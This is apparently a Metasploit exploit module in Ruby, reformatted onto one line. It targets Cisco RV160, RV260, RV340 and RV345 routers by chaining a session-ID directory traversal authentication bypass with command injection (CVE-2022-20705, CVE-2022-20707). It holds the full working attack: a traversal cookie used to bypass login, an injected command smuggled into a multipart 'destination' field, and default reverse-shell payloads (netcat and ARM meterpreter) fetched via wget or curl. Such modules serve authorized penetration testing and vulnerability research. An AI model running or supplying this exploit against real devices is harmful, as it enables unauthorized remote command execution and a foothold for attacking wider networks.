Cisco RV Series Authentication Bypass / Command Injection

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cisco RV Series Authentication Bypass and Command Injection',        'Description' => %q{          This module exploits two vulnerabilities, a session ID directory traversal authentication          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,          and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.          This access can then be used to pivot to other parts of the network. This module works on firmware          versions 1.0.03.24 and below.        },        'License' => MSF_LICENSE,        'Platform' => ['linux', 'unix'],        'Author' => [          'Biem Pham',  # Vulnerability Discoveries          'Neterum',    # Metasploit Module          'jbaines-r7'  # Inspired from cisco_rv_series_authbypass_and_rce.rb        ],        'DisclosureDate' => '2021-11-02',        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'References' => [          ['CVE', '2022-20705'], # Authentication Bypass          ['CVE', '2022-20707'], # Command Injection          ['ZDI', '22-410'], # Authentication Bypass          ['ZDI', '22-411']  # Command Injection        ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'Payload' => {                'BadChars' => '\'#'              },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'Payload' => {                'BadChars' => '\'#'              },              'CmdStagerFlavor' => [ 'wget', 'curl' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'MeterpreterTryToFork' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'Base path', '/'])      ]    )  end  # sessionid utilized later needs to be set to length  # of 16 or exploit will fail. Tested with lengths  # 14-17  def generate_session_id    return Rex::Text.rand_text_alphanumeric(16)  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => '/upload',      'headers' => {        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id      }    }, 10)    # A proper "upload" will trigger file creation. So the send_request_cgi call    # above is an incorrect "upload" call to avoid creating a file on disk. The router will return    # status code 405 Not Allowed if authentication has been bypassed by the above request.    # The firmware containing this authentication bypass also contains the command injection    # vulnerability that will be abused during actual exploitation. Non-vulnerable    # firmware versions will respond with 403 Forbidden.    if res.nil?      return CheckCode::Unknown('The device did not respond to request packet.')    elsif res.code == 405      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')    elsif res.code == 403      return CheckCode::Safe('The device is not vulnerable to exploitation.')    else # Catch-all      return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')    end  end  def execute_command(cmd, _opts = {})    res = send_exploit(cmd)    # Successful unix_cmd shells should not produce a response.    # However if a response is returned, check the status code and return    # Failure::NotVulnerable if it is 403 Forbidden.    if target['Type'] == :unix_cmd && res&.code == 403      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')    end    if target['Type'] == :linux_dropper      fail_with(Failure::Unreachable, 'The target did not respond') unless res      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200      begin        body_json = res.get_json_document        fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json      rescue JSON::ParserError => e        print_error("Failed: #{e.class} - #{e.message}")        fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')      end    end    print_good('Exploit successfully executed.')  end  def send_exploit(cmd)    filename = Rex::Text.rand_text_alphanumeric(5..12)    fileparam = Rex::Text.rand_text_alphanumeric(5..12)    input = Rex::Text.rand_text_alphanumeric(5..12)    # sessionid utilized later needs to be set to length    # of 16 or exploit will fail. Tested with lengths    # 14-17    sessionid = Rex::Text.rand_text_alphanumeric(16)    filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues.    pathparam = 'Configuration'    destination = "'; " + cmd + ' #'    multipart_form = Rex::MIME::Message.new    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')    multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))    # Escaping "/tmp/upload/" folder that does not contain any other permanent files    send_request_cgi({      'method' => 'POST',      'uri' => '/upload',      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",      'headers' => {        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid      },      'data' => multipart_form.to_s    }, 10)  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 120)    end  endend